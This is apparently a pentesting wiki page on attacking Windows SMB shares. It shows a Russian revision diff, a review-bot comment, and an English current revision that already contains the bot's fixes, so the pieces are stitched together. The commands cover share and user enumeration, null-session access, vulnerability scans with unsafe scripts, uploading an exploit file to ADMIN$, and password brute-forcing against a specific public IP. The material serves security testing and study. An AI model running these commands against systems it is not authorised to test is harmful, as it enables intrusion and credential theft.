Smb all: difference between revisions
From InformationSecurity WIKI
Drakylar (talk | contribs) m
Drakylar (talk | contribs) m (→Attack)
(15 intermediate revisions by the same user not shown)
Строка 5: | Строка 5: | ||
==Разведка== | ==Разведка== | ||
− | === | + | ===Все вместе=== |
+ | ====enum4linux==== | ||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | enum4linux -a [-u USERNAME] [-w WORKGROUP] [-p PASSWORD] ip | ||
+ | </syntaxhighlight> | ||
+ | ====nullinux==== | ||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | nullinux [-u 'Domain\User'] [-w WORKGROUP] [-P password] ip | ||
+ | </syntaxhighlight> | ||
+ | ===Поиск сервисов=== | ||
− | ==== | + | ====nmap==== |
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | nmap _ips_ -p 139,445 -v --script=smb-enum* | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | |||
+ | ====nbtscan==== | ||
+ | Доменные имена, мак-адреса. | ||
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
− | + | nbtscan 192.168.1.0/24 | |
</syntaxhighlight> | </syntaxhighlight> | ||
+ | ===Сбор информации=== | ||
====nmblookup==== | ====nmblookup==== | ||
Входит в enum4linux | Входит в enum4linux | ||
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
nmblookup -A target | nmblookup -A target | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | ====smb_version==== | ||
+ | Определяем версию | ||
+ | |||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | msf auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/smb_version | ||
+ | msf auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.31.142 | ||
+ | RHOSTS => 192.168.31.142 | ||
+ | msf auxiliary(scanner/smb/smb_version) > run | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | ===Поиск пользователей=== | ||
+ | |||
+ | ====smb_lookupsid==== | ||
+ | |||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | msf auxiliary(scanner/smb/smb_lookupsid) > use auxiliary/scanner/smb/smb_lookupsid | ||
+ | msf auxiliary(scanner/smb/smb_lookupsid) > set RHOSTS 192.168.31.142 | ||
+ | RHOSTS => 192.168.31.142 | ||
+ | msf auxiliary(scanner/smb/smb_lookupsid) > run | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | ====nmap==== | ||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.11.200-254 | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | ====impacket-samrdump==== | ||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | python /usr/share/doc/python-impacket-doc/examples | ||
+ | /samrdump.py 192.168.XXX.XXX | ||
+ | |||
+ | impacket-samrdump 192.168.XXX.XXX | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | ===Список сетевых хранилищ=== | ||
+ | |||
+ | ====smbmap==== | ||
+ | |||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | smbmap -H target | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | ====smbclient==== | ||
+ | |||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | echo exit | smbclient -L \\\\target | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | ====nmap==== | ||
+ | |||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | nmap --script smb-enum-shares -p 139,445 target | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | ==Тестирование== | ||
+ | |||
+ | ===Проверка на доступ с пустой сессией=== | ||
+ | |||
+ | ====smbmap==== | ||
+ | |||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | smbmap -H target | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | |||
+ | ====rpcclient==== | ||
+ | |||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | rpcclient -U "" -N target | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | ====smbclient==== | ||
+ | |||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | smbclient \\\\target\\share_name | ||
+ | |||
+ | smbclient -L //target | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | ====Windows CMD==== | ||
+ | |||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | net use \\TARGET\IPC$ "" /u:"" | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | ===Поиск уязвимостей=== | ||
+ | |||
+ | ====nmap==== | ||
+ | |||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | nmap --script smb-vuln* -p 139,445 target --script-args=unsafe=1 | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | |||
+ | ===Перебор RID (юзеры)=== | ||
+ | |||
+ | ====ridenum==== | ||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | ridenum.py 192.168.XXX.XXX 500 50000 dict.txt | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | ====smb_lookupsid==== | ||
+ | use auxiliary/scanner/smb/smb_lookupsid | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | |||
+ | ===Работа с файлами=== | ||
+ | |||
+ | ====smbclient==== | ||
+ | Загрузка файла | ||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | smbclient //192.168.31.142/ADMIN$ -U "nobody"%"somepassword" -c "put 40280.py" | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | Примонтировать директорию | ||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | smbclient -L \\WIN7\ -I 192.168.13.218 | ||
+ | smbclient -L \\WIN7\ADMIN$ -I 192.168.13.218 | ||
+ | smbclient -L \\WIN7\C$ -I 192.168.13.218 | ||
+ | smbclient -L \\WIN7\IPC$ -I 192.168.13.218 | ||
+ | smbclient \\192.168.13.236\some-share -o user=root,pass=root,workgroup=BOB | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | ====mount==== | ||
+ | |||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | mount -t auto --source //192.168.31.147/kathy --target /tmp/smb/ -o username=root,workgroup=WORKGROUP | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | ====Windows CMD==== | ||
+ | |||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | net use X: \\<server>\<sharename> /USER:<domain>\<username> <password> /PERSISTENT:YES | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | ====smbspider==== | ||
+ | |||
+ | Утверждают что одна из лучших тулз для работы в виндовыми сетевыми хранилищами. | ||
+ | |||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | smbspider [-h] -ip IPADDRESS -s SHARE [-f SUBFOLDER] [-pa PATTERN] | ||
+ | [-pf PATTERNFILE] [-u USER] [-p PWD] [-d DOMAIN] | ||
+ | [-r RECURSIVE] [-t THREADS] | ||
</syntaxhighlight> | </syntaxhighlight> | ||
==Атака== | ==Атака== | ||
− | |||
− | === | + | ===Перебор паролей=== |
+ | |||
+ | ====smb_login==== | ||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | use auxiliary/scanner/smb/smb_login | ||
+ | </syntaxhighlight> | ||
+ | |||
+ | ====smbrute.py==== | ||
+ | |||
+ | https://github.com/m4ll0k/SMBrute | ||
+ | |||
+ | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
+ | python3 smbrute.py -h 2.35.69.44 -U user.txt -P pass.txt -t 10 | ||
+ | </syntaxhighlight> | ||
==Ссылки== | ==Ссылки== | ||
+ | |||
+ | [https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#smb-enumeration-tools cheatsheet pentest] |
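Review bot: the ====smb_lookupsid==== block under ===Перебор RID (юзеры)=== closes a `</syntaxhighlight>` that was never opened, so `use auxiliary/scanner/smb/smb_lookupsid` renders as plain text and the stray close tag leaks into the page; give it the same `<syntaxhighlight lang="bash" ...>` opener the neighbouring blocks use. In the ===Работа с файлами=== smbclient block, `smbclient \\192.168.13.236\some-share -o user=root,pass=root,workgroup=BOB` uses mount.cifs option syntax that smbclient does not accept; smbclient takes credentials as `-U root%root` and the workgroup as `-W BOB`. The four `-L \\WIN7\...` lines above it pass unquoted single backslashes, which bash strips before smbclient sees them, so the UNC paths should be single-quoted or written as `//WIN7/...`. The mount line uses `-t auto`, which cannot detect a network filesystem; `-t cifs` is needed for an SMB share. Finally, the impacket-samrdump command is wrapped across two lines (`/usr/share/doc/python-impacket-doc/examples` and `/samrdump.py`), so it will not paste cleanly.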
Current revision as of 13:58, 6 May 2020

==Description==

==Reconnaissance==

===All-in-one===

====enum4linux====
<syntaxhighlight lang="bash">
enum4linux -a [-u USERNAME] [-w WORKGROUP] [-p PASSWORD] ip
</syntaxhighlight>

====nullinux====
<syntaxhighlight lang="bash">
nullinux [-u 'Domain\User'] [-w WORKGROUP] [-P password] ip
</syntaxhighlight>

===Service discovery===

====nmap====
<syntaxhighlight lang="bash">
# the script glob is quoted so the shell does not expand it against local files
nmap _ips_ -p 139,445 -v --script='smb-enum*'
</syntaxhighlight>

====nbtscan====
Domain names and MAC addresses.
<syntaxhighlight lang="bash">
nbtscan 192.168.1.0/24
</syntaxhighlight>

===Information gathering===

====nmblookup====
Included in enum4linux.
<syntaxhighlight lang="bash">
nmblookup -A target
</syntaxhighlight>

====smb_version====
Determine the SMB version.
<syntaxhighlight lang="bash">
msf auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/smb_version
msf auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.31.142
RHOSTS => 192.168.31.142
msf auxiliary(scanner/smb/smb_version) > run
</syntaxhighlight>

===User enumeration===

====smb_lookupsid====
<syntaxhighlight lang="bash">
msf auxiliary(scanner/smb/smb_lookupsid) > use auxiliary/scanner/smb/smb_lookupsid
msf auxiliary(scanner/smb/smb_lookupsid) > set RHOSTS 192.168.31.142
RHOSTS => 192.168.31.142
msf auxiliary(scanner/smb/smb_lookupsid) > run
</syntaxhighlight>

====nmap====
<syntaxhighlight lang="bash">
nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.11.200-254
</syntaxhighlight>

====impacket-samrdump====
<syntaxhighlight lang="bash">
python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX

impacket-samrdump 192.168.XXX.XXX
</syntaxhighlight>

===Listing network shares===

====smbmap====
<syntaxhighlight lang="bash">
smbmap -H target
</syntaxhighlight>

====smbclient====
<syntaxhighlight lang="bash">
echo exit | smbclient -L \\\\target
</syntaxhighlight>

====nmap====
<syntaxhighlight lang="bash">
nmap --script smb-enum-shares -p 139,445 target
</syntaxhighlight>

==Testing==

===Null-session access check===

====smbmap====
<syntaxhighlight lang="bash">
smbmap -H target
</syntaxhighlight>

====rpcclient====
<syntaxhighlight lang="bash">
rpcclient -U "" -N target
</syntaxhighlight>

====smbclient====
<syntaxhighlight lang="bash">
smbclient \\\\target\\share_name

smbclient -L //target
</syntaxhighlight>

====Windows CMD====
<syntaxhighlight lang="bat">
net use \\TARGET\IPC$ "" /u:""
</syntaxhighlight>

===Vulnerability scanning===

====nmap====
<syntaxhighlight lang="bash">
nmap --script 'smb-vuln*' -p 139,445 target --script-args=unsafe=1
</syntaxhighlight>

===RID enumeration (users)===

====ridenum====
<syntaxhighlight lang="bash">
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt
</syntaxhighlight>

====smb_lookupsid====
<syntaxhighlight lang="bash">
use auxiliary/scanner/smb/smb_lookupsid
</syntaxhighlight>

==Working with files==

====smbclient====
Uploading a file
<syntaxhighlight lang="bash">
smbclient //192.168.31.142/ADMIN$ -U "nobody"%"somepassword" -c "put 40280.py"
</syntaxhighlight>

Mount a directory
<syntaxhighlight lang="bash">
# UNC paths are single-quoted so the shell keeps the backslashes
smbclient -L '\\WIN7' -I 192.168.13.218
smbclient -L '\\WIN7\ADMIN$' -I 192.168.13.218
smbclient -L '\\WIN7\C$' -I 192.168.13.218
smbclient -L '\\WIN7\IPC$' -I 192.168.13.218
# smbclient takes credentials as -U user%password and the workgroup as -W
# (the -o key=value form belongs to mount.cifs, not smbclient)
smbclient '\\192.168.13.236\some-share' -U root%root -W BOB
</syntaxhighlight>

====mount====
<syntaxhighlight lang="bash">
# the filesystem type must be given explicitly: mount cannot autodetect a network share
mount -t cifs --source //192.168.31.147/kathy --target /tmp/smb/ -o username=root,workgroup=WORKGROUP
</syntaxhighlight>

====Windows CMD====
<syntaxhighlight lang="bat">
net use X: \\<server>\<sharename> /USER:<domain>\<username> <password> /PERSISTENT:YES
</syntaxhighlight>

====smbspider====
Claimed to be one of the best tools for working with Windows network shares.
<syntaxhighlight lang="bash">
smbspider [-h] -ip IPADDRESS -s SHARE [-f SUBFOLDER] [-pa PATTERN]
          [-pf PATTERNFILE] [-u USER] [-p PWD] [-d DOMAIN]
          [-r RECURSIVE] [-t THREADS]
</syntaxhighlight>

==Attack==

===Password brute-forcing===

====smb_login====
<syntaxhighlight lang="bash">
use auxiliary/scanner/smb/smb_login
</syntaxhighlight>

====smbrute.py====
https://github.com/m4ll0k/SMBrute
<syntaxhighlight lang="bash">
python3 smbrute.py -h 2.35.69.44 -U user.txt -P pass.txt -t 10
</syntaxhighlight>

==Links==

[https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#smb-enumeration-tools cheatsheet pentest]